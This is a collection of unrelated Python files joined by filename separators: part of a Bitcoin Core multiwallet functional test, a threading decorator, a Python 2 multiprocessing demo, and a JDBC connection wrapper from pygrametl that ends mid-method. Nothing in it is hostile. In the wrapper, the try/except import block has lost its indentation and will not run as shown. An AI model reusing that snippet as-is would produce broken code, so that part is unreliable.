        # create symlink to verify wallet directory path can be referenced
        # through symlink
        os.mkdir(wallet_dir('w7'))
        os.symlink('w7', wallet_dir('w7_symlink'))

        os.symlink('..', wallet_dir('recursive_dir_symlink'))

        os.mkdir(wallet_dir('self_walletdat_symlink'))
        os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))

        # rename wallet.dat to make sure plain wallet file paths (as opposed to
        # directory paths) can be loaded
        # create another dummy wallet for use in testing backups later
        self.start_node(0)
        node.createwallet("empty")
        node.createwallet("plain")
        node.createwallet("created")
        self.stop_nodes()
        empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
        os.rename(wallet_file("empty"), empty_wallet)
        shutil.rmtree(wallet_dir("empty"))
        empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
        os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
        shutil.rmtree(wallet_dir("created"))
        os.rename(wallet_file("plain"), wallet_dir("w8"))
        shutil.rmtree(wallet_dir("plain"))

        # restart node with a mix of wallet names:
        #   w1, w2, w3 - to verify new wallets created when non-existing paths specified
        #   w          - to verify wallet name matching works when one wallet path is prefix of another
        #   sub/w5     - to verify relative wallet path is created correctly
        #   extern/w6  - to verify absolute wallet path is created correctly
        #   w7_symlink - to verify symlinked wallet path is initialized correctly
        #   w8         - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
        #   ''         - to verify default wallet file is created correctly
        to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
        in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create]  # Wallets in the wallet dir
        in_wallet_dir.append('w7')  # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
        to_create.append(os.path.join(self.options.tmpdir, 'extern/w6'))  # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
        to_load = [self.default_wallet_name]
        if not self.options.descriptors:
            to_load.append('w8')
        wallet_names = to_create + to_load  # Wallet names loaded in the wallet
        in_wallet_dir += to_load  # The loaded wallets are also in the wallet dir
        self.start_node(0)
        for wallet_name in to_create:
            self.nodes[0].createwallet(wallet_name)
        for wallet_name in to_load:
            self.nodes[0].loadwallet(wallet_name)

        os.mkdir(wallet_dir('no_access'))
        os.chmod(wallet_dir('no_access'), 0)
        try:
            with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
                walletlist = self.nodes[0].listwalletdir()['wallets']
        finally:
            # Need to ensure access is restored for cleanup
            os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
        assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))

        assert_equal(set(node.listwallets()), set(wallet_names))

        # should raise rpc error if wallet path can't be created
        err_code = -4 if self.options.descriptors else -1
        assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")

        # check that all requested wallets were created
        self.stop_node(0)
        for wallet_name in wallet_names:
            assert_equal(os.path.isfile(wallet_file(wallet_name)), True)

        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
        self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())

        self.start_node(0, ['-wallet=w1', '-wallet=w1'])
        self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')

        if not self.options.descriptors:
            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # should not initialize if one wallet is a copy of another
            shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
            in_wallet_dir.append('w8_copy')
            exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

            # should not initialize if wallet file is a symlink
            os.symlink('w8', wallet_dir('w8_symlink'))
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)

        # should not initialize if the specified walletdir does not exist
        self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
        # should not initialize if the specified walletdir is not a directory
        not_a_dir = wallet_dir('notadir')
        open(not_a_dir, 'a', encoding="utf8").close()
        self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')

        self.log.info("Do not allow -upgradewallet with multiwallet")
        self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")

        # if wallets/ doesn't exist, datadir should be the default wallet dir
        wallet_dir2 = data_dir('walletdir')
        os.rename(wallet_dir(), wallet_dir2)
        self.start_node(0)
        self.nodes[0].createwallet("w4")
        self.nodes[0].createwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        node.generatetoaddress(nblocks=1, address=w5.getnewaddress())

        # now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
        os.rename(wallet_dir2, wallet_dir())
        self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
        self.nodes[0].loadwallet("w4")
        self.nodes[0].loadwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        w5_info = w5.getwalletinfo()
        assert_equal(w5_info['immature_balance'], 50)

        competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
        os.mkdir(competing_wallet_dir)
        self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
        self.nodes[0].createwallet(self.default_wallet_name)
        if self.options.descriptors:
            exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
        else:
            exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
        self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

        self.restart_node(0)
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        wallets = [wallet(w) for w in wallet_names]
        wallet_bad = wallet("bad")

        # check wallet names and balances
        node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
        for wallet_name, wallet in zip(wallet_names, wallets):
            info = wallet.getwalletinfo()
            assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
            assert_equal(info['walletname'], wallet_name)

        # accessing invalid wallet fails
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)

        # accessing wallet RPC without using wallet endpoint fails
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)

        w1, w2, w3, w4, *_ = wallets
        node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
        assert_equal(w1.getbalance(), 100)
        assert_equal(w2.getbalance(), 0)
        assert_equal(w3.getbalance(), 0)
        assert_equal(w4.getbalance(), 0)

        w1.sendtoaddress(w2.getnewaddress(), 1)
        w1.sendtoaddress(w3.getnewaddress(), 2)
        w1.sendtoaddress(w4.getnewaddress(), 3)
        node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
        assert_equal(w2.getbalance(), 1)
        assert_equal(w3.getbalance(), 2)
        assert_equal(w4.getbalance(), 3)

        batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
        assert_equal(batch[0]["result"]["chain"], self.chain)
        assert_equal(batch[1]["result"]["walletname"], "w1")

        self.log.info('Check for per-wallet settxfee call')
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], 0)
        w2.settxfee(0.001)
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))

        self.log.info("Test dynamic wallet loading")

        self.restart_node(0, ['-nowallet'])
        assert_equal(node.listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)

        self.log.info("Load first wallet")
        loadwallet_name = node.loadwallet(wallet_names[0])
        assert_equal(loadwallet_name['name'], wallet_names[0])
        assert_equal(node.listwallets(), wallet_names[0:1])
        node.getwalletinfo()
        w1 = node.get_wallet_rpc(wallet_names[0])
        w1.getwalletinfo()

        self.log.info("Load second wallet")
        loadwallet_name = node.loadwallet(wallet_names[1])
        assert_equal(loadwallet_name['name'], wallet_names[1])
        assert_equal(node.listwallets(), wallet_names[0:2])
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
        w2 = node.get_wallet_rpc(wallet_names[1])
        w2.getwalletinfo()

        self.log.info("Concurrent wallet loading")
        threads = []
        for _ in range(3):
            n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
            t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        global got_loading_error
        assert_equal(got_loading_error, True)

        self.log.info("Load remaining wallets")
        for wallet_name in wallet_names[2:]:
            loadwallet_name = self.nodes[0].loadwallet(wallet_name)
            assert_equal(loadwallet_name['name'], wallet_name)

        assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))

        # Fail to load if wallet doesn't exist
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')

        # Fail to load duplicate wallets
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
        else:
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])

            # This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
            # Fail to load duplicate wallets by different ways (directory and filepath)
            path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
            assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')

            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # Fail to load if one wallet is a copy of another
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if wallet file is a symlink
            assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')

        # Fail to load if a directory is specified that doesn't contain a wallet
        os.mkdir(wallet_dir('empty_wallet_dir'))
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')

        self.log.info("Test dynamic wallet creation.")
        # Fail to create a wallet if it already exists.
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
        assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')

        # Successfully create a wallet with a new name
        loadwallet_name = self.nodes[0].createwallet('w9')
        in_wallet_dir.append('w9')
        assert_equal(loadwallet_name['name'], 'w9')
        w9 = node.get_wallet_rpc('w9')
        assert_equal(w9.getwalletinfo()['walletname'], 'w9')

        assert 'w9' in self.nodes[0].listwallets()

        # Successfully create a wallet using a full path
        new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
        new_wallet_name = os.path.join(new_wallet_dir, 'w10')
        loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
        assert_equal(loadwallet_name['name'], new_wallet_name)
        w10 = node.get_wallet_rpc(new_wallet_name)
        assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)

        assert new_wallet_name in self.nodes[0].listwallets()

        self.log.info("Test dynamic wallet unloading")

        # Test `unloadwallet` errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),

        # Successfully unload the specified wallet name
        self.nodes[0].unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Unload w1 again, this time providing the wallet name twice
        self.nodes[0].loadwallet("w1")
        assert 'w1' in self.nodes[0].listwallets()
        w1.unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Successfully unload the wallet referenced by the request endpoint
        # Also ensure unload works during walletpassphrase timeout
        w2.encryptwallet('test')
        w2.walletpassphrase('test', 1)
        w2.unloadwallet()
        time.sleep(1.1)
        assert 'w2' not in self.nodes[0].listwallets()

        # Successfully unload all wallets
        for wallet_name in self.nodes[0].listwallets():
            self.nodes[0].unloadwallet(wallet_name)
        assert_equal(self.nodes[0].listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)

        # Successfully load a previously unloaded wallet
        self.nodes[0].loadwallet('w1')
        assert_equal(self.nodes[0].listwallets(), ['w1'])
        assert_equal(w1.getwalletinfo()['walletname'], 'w1')

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        # Test backing up and restoring wallets
        self.log.info("Test wallet backup")
        self.restart_node(0, ['-nowallet'])
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)
        for wallet_name in wallet_names:
            rpc = self.nodes[0].get_wallet_rpc(wallet_name)
            addr = rpc.getnewaddress()
            backup = os.path.join(self.options.tmpdir, 'backup.dat')
            if os.path.exists(backup):
                os.unlink(backup)
            rpc.backupwallet(backup)
            self.nodes[0].unloadwallet(wallet_name)
            shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
            self.nodes[0].unloadwallet(wallet_name)
            shutil.copyfile(backup, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], True)

        # Test .walletlock file is closed
        self.start_node(1)
        wallet = os.path.join(self.options.tmpdir, 'my_wallet')
        self.nodes[0].createwallet(wallet)
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
        else:
            assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
        self.nodes[0].unloadwallet(wallet)
        self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
    # Run the functional test via the framework's entry point.
    MultiWalletTest().main()
|
threaded.py
|
''' threaded.py
Threaded command module
Copyright 2008 Corey Tabaka
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import functools
import threading
def threaded(func):
    """Decorator that runs *func* in a freshly started background thread.

    The wrapped callable starts a ``threading.Thread`` targeting *func*
    with the single ``context`` argument and returns the started
    ``Thread`` so callers can ``join()`` it (the original discarded it).
    ``functools.wraps`` replaces the manual copying of ``__module__``,
    ``__name__`` and ``__doc__`` done previously.
    """
    @functools.wraps(func)
    def delegate(context):
        t = threading.Thread(target=func, args=(context,))
        t.start()
        return t
    return delegate
|
multipro.py
|
#/usr/bin/env python
#coding=utf8
"""
# Author: kellanfan
# Created Time : Tue 18 Jul 2017 08:14:59 PM CST
# File Name: multipro.py
# Description:
"""
from multiprocessing import Process
import os
# Code executed by the child process.
def run_proc(name):
    # Python 2 print statement: report the child's label and PID.
    print 'Run child process %s (%s)...' % (name, os.getpid())
if __name__=='__main__':
    print 'Parent process %s.' % os.getpid()
    # Spawn a single child running run_proc('test') and wait for it.
    p = Process(target=run_proc, args=('test',))
    print 'Process will start.'
    p.start()
    p.join()
    print 'Process end.'
|
JDBCConnectionWrapper.py
|
"""This module holds a ConnectionWrapper that is used with a
JDBC Connection. The module should only be used when running Jython.
"""
# Copyright (c) 2009-2014, Aalborg University (pygrametl@cs.aau.dk)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from copy import copy as pcopy
from sys import modules
from threading import Thread
import java.sql as jdbc
import pygrametl
from pygrametl.FIFODict import FIFODict
# Needed for both pip2 and pip3 to be supported
try:
from Queue import Queue
except ImportError:
from queue import Queue
# NOTE: This module is made for Jython.
__author__ = "Christian Thomsen"
__maintainer__ = "Christian Thomsen"
__version__ = '2.3'
__all__ = ['JDBCConnectionWrapper', 'BackgroundJDBCConnectionWrapper']
class JDBCConnectionWrapper(object):
    """Wrap a JDBC Connection.

    All Dimension and FactTable communicate with the data warehouse using
    a ConnectionWrapper. In this way, the code for loading the DW does not
    have to care about which parameter format is used.
    This ConnectionWrapper is a special one for JDBC in Jython.
    """

    def __init__(self, jdbcconn, stmtcachesize=20):
        """Create a ConnectionWrapper around the given JDBC connection.

        If no default ConnectionWrapper already exists, the new
        ConnectionWrapper is set to be the default ConnectionWrapper.

        Arguments:
        - jdbcconn: An open JDBC Connection (not a PEP249 Connection)
        - stmtcachesize: The maximum number of PreparedStatements kept
          open. Default: 20.
        """
        if not isinstance(jdbcconn, jdbc.Connection):
            raise TypeError('1st argument must implement java.sql.Connection')
        if jdbcconn.isClosed():
            raise ValueError('1st argument must be an open Connection')
        self.__jdbcconn = jdbcconn
        # Add a finalizer to __prepstmts to close PreparedStatements when
        # they are pushed out of the bounded cache.
        self.__prepstmts = FIFODict(stmtcachesize, lambda k, v: v[0].close())
        self.__resultmeta = FIFODict(stmtcachesize)
        self.__resultset = None
        self.__resultnames = None
        self.__resulttypes = None
        self.nametranslator = lambda s: s
        self.__jdbcconn.setAutoCommit(False)
        if pygrametl._defaulttargetconnection is None:
            pygrametl._defaulttargetconnection = self

    def __preparejdbcstmt(self, sql):
        # Find pyformat arguments (%(name)s) and change them to JDBC '?'
        # placeholders while appending the attribute names to a list.
        names = []
        newsql = sql
        while True:
            start = newsql.find('%(')
            if start == -1:
                break
            end = newsql.find(')s', start)
            if end == -1:
                break
            name = newsql[start + 2: end]
            names.append(name)
            newsql = newsql.replace(newsql[start:end + 2], '?', 1)
        ps = self.__jdbcconn.prepareStatement(newsql)
        # Find parameter types (JDBC parameter indexes are 1-based).
        types = []
        parmeta = ps.getParameterMetaData()
        for i in range(len(names)):
            types.append(parmeta.getParameterType(i + 1))
        self.__prepstmts[sql] = (ps, names, types)

    def __executejdbcstmt(self, sql, args):
        # Close any previous open ResultSet before running a new statement.
        if self.__resultset:
            self.__resultset.close()
        if sql not in self.__prepstmts:
            self.__preparejdbcstmt(sql)
        (ps, names, types) = self.__prepstmts[sql]
        # Not very Pythonic, but we're doing Java
        for pos in range(len(names)):
            if args[names[pos]] is None:
                ps.setNull(pos + 1, types[pos])
            else:
                ps.setObject(pos + 1, args[names[pos]], types[pos])
        if ps.execute():
            # execute() returned True: the statement produced a ResultSet.
            self.__resultset = ps.getResultSet()
            if sql not in self.__resultmeta:
                self.__resultmeta[sql] = \
                    self.__extractresultmetadata(self.__resultset)
            (self.__resultnames, self.__resulttypes) = self.__resultmeta[sql]
        else:
            self.__resultset = None
            (self.__resultnames, self.__resulttypes) = (None, None)

    def __extractresultmetadata(self, resultset):
        # Get jdbc resultset metadata and extract column names and types
        # (JDBC column indexes are 1-based).
        meta = resultset.getMetaData()
        names = []
        types = []
        for col in range(meta.getColumnCount()):
            names.append(meta.getColumnName(col + 1))
            types.append(meta.getColumnType(col + 1))
        return (names, types)

    def __readresultrow(self):
        # Convert the current ResultSet row into a tuple of Python values,
        # picking a type-appropriate getter for each column.
        if self.__resultset is None:
            return None
        result = []
        for i in range(len(self.__resulttypes)):
            e = self.__resulttypes[i]  # Not Pythonic, but we need i for JDBC
            if e in (jdbc.Types.CHAR, jdbc.Types.VARCHAR,
                     jdbc.Types.LONGVARCHAR):
                result.append(self.__resultset.getString(i + 1))
            elif e in (jdbc.Types.BIT, jdbc.Types.BOOLEAN):
                # BUG FIX: java.sql.ResultSet defines getBoolean, not
                # getBool; the old getBool call raised an AttributeError.
                result.append(self.__resultset.getBoolean(i + 1))
            elif e in (jdbc.Types.TINYINT, jdbc.Types.SMALLINT,
                       jdbc.Types.INTEGER):
                result.append(self.__resultset.getInt(i + 1))
            elif e in (jdbc.Types.BIGINT, ):
                result.append(self.__resultset.getLong(i + 1))
            elif e in (jdbc.Types.DATE, ):
                result.append(self.__resultset.getDate(i + 1))
            elif e in (jdbc.Types.TIMESTAMP, ):
                result.append(self.__resultset.getTimestamp(i + 1))
            elif e in (jdbc.Types.TIME, ):
                result.append(self.__resultset.getTime(i + 1))
            else:
                # Try this and hope for the best...
                result.append(self.__resultset.getString(i + 1))
        return tuple(result)

    def execute(self, stmt, arguments=None, namemapping=None, ignored=None):
        """Execute a statement.

        Arguments:
        - stmt: the statement to execute
        - arguments: a mapping with the arguments. Default: None.
        - namemapping: a mapping of names such that if stmt uses %(arg)s
          and namemapping[arg]=arg2, the value arguments[arg2] is used
          instead of arguments[arg]
        - ignored: An ignored argument only present to accept the same
          number of arguments as ConnectionWrapper.execute
        """
        if namemapping and arguments:
            arguments = pygrametl.copy(arguments, **namemapping)
        self.__executejdbcstmt(stmt, arguments)

    def executemany(self, stmt, params, ignored=None):
        """Execute a sequence of statements.

        Arguments:
        - stmt: the statement to execute
        - params: a sequence of arguments
        - ignored: An ignored argument only present to accept the same
          number of arguments as ConnectionWrapper.executemany
        """
        for paramset in params:
            self.__executejdbcstmt(stmt, paramset)

    def rowfactory(self, names=None):
        """Return a generator object returning result rows (i.e. dicts)."""
        if names is None:
            if self.__resultnames is None:
                return
            else:
                names = [self.nametranslator(t) for t in self.__resultnames]
        empty = (None, ) * len(self.__resultnames)
        while True:
            datatuple = self.fetchonetuple()
            # An all-None tuple marks exhaustion (see fetchonetuple).
            if datatuple == empty:
                return
            yield dict(zip(names, datatuple))

    def fetchone(self, names=None):
        """Return one result row (i.e. dict)."""
        if self.__resultset is None:
            return {}
        if names is None:
            names = [self.nametranslator(t) for t in self.__resultnames]
        values = self.fetchonetuple()
        return dict(zip(names, values))

    def fetchonetuple(self):
        """Return one result tuple (all-None when exhausted)."""
        if self.__resultset is None:
            return ()
        if not self.__resultset.next():
            return (None, ) * len(self.__resultnames)
        else:
            return self.__readresultrow()

    def fetchmanytuples(self, cnt):
        """Return at most cnt result tuples."""
        if self.__resultset is None:
            return []
        empty = (None, ) * len(self.__resultnames)
        result = []
        for _ in range(cnt):
            tmp = self.fetchonetuple()
            if tmp == empty:
                break
            result.append(tmp)
        return result

    def fetchalltuples(self):
        """Return all result tuples"""
        if self.__resultset is None:
            return []
        result = []
        empty = (None, ) * len(self.__resultnames)
        while True:
            tmp = self.fetchonetuple()
            if tmp == empty:
                return result
            result.append(tmp)

    def rowcount(self):
        """Not implemented. Return 0. Should return the size of the result."""
        return 0

    def getunderlyingmodule(self):
        """Return a reference to the underlying connection's module."""
        return modules[self.__class__.__module__]

    def commit(self):
        """Commit the transaction."""
        pygrametl.endload()
        self.__jdbcconn.commit()

    def close(self):
        """Close the connection to the database,"""
        if pygrametl._defaulttargetconnection is self:
            pygrametl._defaulttargetconnection = None
        self.__jdbcconn.close()

    def rollback(self):
        """Rollback the transaction."""
        self.__jdbcconn.rollback()

    def setasdefault(self):
        """Set this ConnectionWrapper as the default connection."""
        pygrametl._defaulttargetconnection = self

    def cursor(self):
        """Not implemented for this JDBC connection wrapper!"""
        raise NotImplementedError(".cursor() not supported")

    def resultnames(self):
        """Return a tuple of the current result's column names, or None."""
        if self.__resultnames is None:
            return None
        else:
            return tuple(self.__resultnames)
# BackgroundJDBCConnectionWrapper is added for experiments. It is quite similar
# to JDBCConnectionWrapper and one of them may be removed.
class BackgroundJDBCConnectionWrapper(object):
    """Wrap a JDBC Connection and do all DB communication in the background.

    All Dimension and FactTable communicate with the data warehouse using
    a ConnectionWrapper. In this way, the code for loading the DW does not
    have to care about which parameter format is used.
    This ConnectionWrapper is a special one for JDBC in Jython and does DB
    communication from a Thread.

    .. Note::
        BackgroundJDBCConnectionWrapper is added for experiments.
        It is quite similar to JDBCConnectionWrapper and one of them may be
        removed.
    """

    def __init__(self, jdbcconn, stmtcachesize=20):
        """Create a ConnectionWrapper around the given JDBC connection

        Arguments:
        - jdbcconn: An open JDBC Connection (not a PEP249 Connection)
        - stmtcachesize: The maximum number of PreparedStatements kept
          open. Default: 20.
        """
        self.__jdbcconn = jdbcconn
        # Add a finalizer to __prepstmts to close PreparedStatements when
        # they are pushed out of the bounded cache.
        self.__prepstmts = FIFODict(stmtcachesize, lambda k, v: v[0].close())
        self.__resultmeta = FIFODict(stmtcachesize)
        self.__resultset = None
        self.__resultnames = None
        self.__resulttypes = None
        self.nametranslator = lambda s: s
        self.__jdbcconn.setAutoCommit(False)
        # All statements run sequentially on a single daemon thread that
        # consumes this queue; readers call queue.join() before touching
        # results so they never race pending work.
        self.__queue = Queue(5000)
        t = Thread(target=self.__worker)
        t.setDaemon(True)  # NB: "t.daemon = True" does NOT work...
        t.setName('BackgroundJDBCConnectionWrapper')
        t.start()

    def __worker(self):
        # Consume (sql, args) pairs forever; task_done() enables join().
        while True:
            (sql, args) = self.__queue.get()
            self.__executejdbcstmt(sql, args)
            self.__queue.task_done()

    def __preparejdbcstmt(self, sql):
        # Find pyformat arguments (%(name)s) and change them to JDBC '?'
        # placeholders while appending the attribute names to a list.
        names = []
        newsql = sql
        while True:
            start = newsql.find('%(')
            if start == -1:
                break
            end = newsql.find(')s', start)
            if end == -1:
                break
            name = newsql[start + 2: end]
            names.append(name)
            newsql = newsql.replace(newsql[start:end + 2], '?', 1)
        ps = self.__jdbcconn.prepareStatement(newsql)
        # Find parameter types (JDBC parameter indexes are 1-based).
        types = []
        parmeta = ps.getParameterMetaData()
        for i in range(len(names)):
            types.append(parmeta.getParameterType(i + 1))
        self.__prepstmts[sql] = (ps, names, types)

    def __executejdbcstmt(self, sql, args):
        # Close any previous open ResultSet before running a new statement.
        if self.__resultset:
            self.__resultset.close()
        if sql not in self.__prepstmts:
            self.__preparejdbcstmt(sql)
        (ps, names, types) = self.__prepstmts[sql]
        # Not very Pythonic, but we're doing Java
        for pos in range(len(names)):
            if args[names[pos]] is None:
                ps.setNull(pos + 1, types[pos])
            else:
                ps.setObject(pos + 1, args[names[pos]], types[pos])
        if ps.execute():
            # execute() returned True: the statement produced a ResultSet.
            self.__resultset = ps.getResultSet()
            if sql not in self.__resultmeta:
                self.__resultmeta[sql] = \
                    self.__extractresultmetadata(self.__resultset)
            (self.__resultnames, self.__resulttypes) = self.__resultmeta[sql]
        else:
            self.__resultset = None
            (self.__resultnames, self.__resulttypes) = (None, None)

    def __extractresultmetadata(self, resultset):
        # Get jdbc resultset metadata and extract column names and types
